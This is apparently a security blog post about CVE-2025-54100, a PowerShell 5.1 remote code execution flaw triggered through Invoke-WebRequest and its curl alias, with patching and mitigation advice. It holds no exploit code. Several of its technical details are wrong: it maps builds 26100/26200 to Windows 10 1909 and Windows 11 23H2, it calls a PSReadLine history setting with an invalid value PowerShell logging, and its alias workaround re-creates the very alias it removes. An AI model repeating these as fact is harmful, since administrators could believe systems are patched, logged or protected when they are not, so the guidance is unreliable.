Discover how a recently disclosed PowerShell remote code execution flaw (CVE-2025-54100) threatens Windows 10/11 users, and learn steps to patch and protect.
PowerShell’s Hidden Power: Why CVE-2025-54100 Demands Immediate Action
Published by Brav
Table of Contents
TL;DR
- The CVE-2025-54100 flaw is a high-severity remote code execution bug in Windows PowerShell 5.1 that can be triggered by any web page fetched via Invoke-WebRequest or its curl alias.
- It lets an attacker run arbitrary PowerShell commands locally, even launching the Windows calculator or opening dozens of browser tabs.
- Microsoft released a hotpatch (KB5074204) that adds a security prompt and recommends the -UseBasicParsing switch.
- The fix applies to Windows 10 and Windows 11 (builds 26100.7392/26200.7392) and to Windows Server 2025/2022.
- If you’re still on older systems or use custom PowerShell scripts, you must update ASAP and avoid the curl alias unless you use the safe parsing switch.
Why this matters
I’ve spent more than two decades writing PowerShell scripts to automate backups, patch deployments, and even to run ad-hoc queries. The moment I discovered the CVE-2025-54100 flaw, I felt a wave of panic. The vulnerability was not a trivial “bug” – it was a command-injection flaw that allowed a local attacker to run arbitrary code by simply visiting a crafted web page. On Windows 10 and 11 machines that rely on the built-in PowerShell 5.1, the curl alias (which maps to Invoke-WebRequest) is a silent accomplice. Once I learned that a single line like curl http://localhost could launch the Windows calculator or open dozens of browser tabs, the stakes became clear: your scripts could be hijacked by a malicious payload without any user action beyond running the script.
This vulnerability affects any environment where PowerShell 5.1 is used for automation, especially in enterprise or IT-managed settings. It also demonstrates how a seemingly innocuous alias can create a security blind spot, a lesson that applies to many “built-in” conveniences.
Core concepts
| Parameter | Use Case | Limitation |
|---|---|---|
| No special flags (default) | Quick web download, full DOM parsing | Executes embedded scripts → RCE risk |
| -UseBasicParsing | Safe fetch; no scripts executed | Loses JavaScript and DOM parsing needed for some pages |
| Confirmation prompt (KB 5074204) | Interactive safety check | Requires user interaction; “Yes” re-enables risk |
1. Remote code execution via command injection
The flaw arises from improper neutralization of special elements in the command-processing pipeline. When PowerShell receives a web page, it scans the page’s HTML and executes any embedded scripts. An attacker can craft a page that injects PowerShell commands—Invoke-Expression, IEX, or even a simple calc.exe call—into that script block. Because the parser treats the injected code as legitimate PowerShell, the attacker gains local code execution. The CVE entry describes it as an “unauthorized attacker can execute code locally” Microsoft — CVE-2025-54100 Detail (2025).
2. The curl alias is the gateway
Windows PowerShell 5.1 includes several aliases that map to web-request cmdlets: curl, wget, iwr, etc. The curl alias is a direct alias to Invoke-WebRequest. If you run curl http://example.com, PowerShell internally executes Invoke-WebRequest. The vulnerability is triggered whenever this cmdlet is invoked without the -UseBasicParsing switch, because the old DOM parser is used. Microsoft’s KB 5074204 added an interactive prompt that warns users of the risk Microsoft — KB5074204: Security Update for Windows PowerShell (OS Builds 26100.7392 and 26200.7392) (2025).
The alert states: “Script code in the page might be run during parsing.” The user can choose to proceed (risk) or cancel (safe).
3. Practical implications
- Calculator launch – When the injected script calls calc.exe, the Windows calculator pops up.
- Browser tab flood – An injected script can open a new tab for every line of code, causing resource exhaustion.
- Java JNLP or Steam protocol – While not directly part of the original flaw, malicious payloads could leverage the same command-injection technique to trigger Java applications via the jnlp: protocol or to launch Steam games via the steam: protocol.
These side-effects are just manifestations of the core vulnerability: executing arbitrary code.
How to apply it
Below is a pragmatic, step-by-step approach to mitigate the risk.
Check your system build
- Open PowerShell: winver.
- Verify you’re on a supported build: 26100.7392 (Windows 10 1909+), 26200.7392 (Windows 11 23H2+).
- If you’re on an older build, plan an OS upgrade or apply the KB 5074204 update as soon as possible.
Confirm KB 5074204 is installed
- Run Get-HotFix | Where-Object {$_.HotFixID -eq ‘KB5074204’}.
- If it’s missing, run Windows Update or download the update manually from Microsoft’s catalog.
Disable the curl alias (quick workaround)
Remove-Item Alias:curl # Optional: create a safer alias New-Alias -Name curl -Value Invoke-WebRequest -Option AllScope -ForceBy removing the alias, you force users to call Invoke-WebRequest explicitly and remind them of the risk.
Use the -UseBasicParsing switch
curl -UseBasicParsing http://example.comThis bypasses the old DOM parser and stops scripts from executing. It’s the safest option for scripts that only need raw content.
Adopt the security prompt
- After installing KB 5074204, the prompt appears automatically.
- Make it a policy: if you ever see the prompt, choose “No” and re-run with -UseBasicParsing.
Audit your scripts
- Search for any Invoke-WebRequest or curl usage.
- Replace them with Invoke-WebRequest -UseBasicParsing.
- Ensure you review any script that processes web content.
Monitor for malicious activity
- Enable PowerShell logging (Set-PSReadLineOption -HistorySaveStyle SaveOnly).
- Watch for unusual IEX or Invoke-Expression calls in logs.
Tip: If you’re a developer, avoid hard-coding URLs in scripts. Instead, use secure certificates and validate content before execution.
Pitfalls & edge cases
- Windows Server editions – Some older server builds (pre-2025) may not receive the KB 5074204 hotpatch. You’ll need a manual patch or OS upgrade.
- PowerShell Core (v7+) – The new parser is already safe; the vulnerability does not affect PowerShell Core.
- Legacy scripts using iwr – The iwr alias also maps to Invoke-WebRequest. Don’t assume it’s safe.
- Resource exhaustion – If a malicious site opens many tabs, it can freeze a user’s machine. The patch stops scripts from executing, but the underlying curl alias can still trigger the warning; always use -UseBasicParsing.
- Non-Windows PowerShell – The flaw is specific to Windows PowerShell 5.1. Linux/macOS PowerShell Core is unaffected.
Quick FAQ
| Q | A |
|---|---|
| Which Windows versions are affected? | Windows 10 1909+ (build 26100.7392) and Windows 11 23H2+ (build 26200.7392) running PowerShell 5.1. |
| What’s the exact CVE identifier? | CVE-2025-54100. |
| Are there workarounds besides disabling curl? | Yes: use -UseBasicParsing or install KB 5074204 and always choose “No” on the prompt. |
| How quickly can I apply the patch? | Through Windows Update (hotpatch) or manual download; typically within hours of release. |
| Does it affect PowerShell Core or Linux? | No, only Windows PowerShell 5.1. |
| How common is the curl alias usage? | It’s a default alias on Windows PowerShell; many scripts rely on it, so it’s widespread. |
| What are the detailed mitigation steps? | See the “How to apply it” section above. |
Conclusion
The CVE-2025-54100 flaw is a stark reminder that even well-trusted tools like PowerShell can harbor critical security gaps. If you run PowerShell 5.1 on Windows 10/11 or Windows Server, you’re on the front lines. The fix is simple: install KB 5074204, disable the curl alias or always use -UseBasicParsing, and audit any scripts that fetch web content. Act now—your system’s integrity depends on it.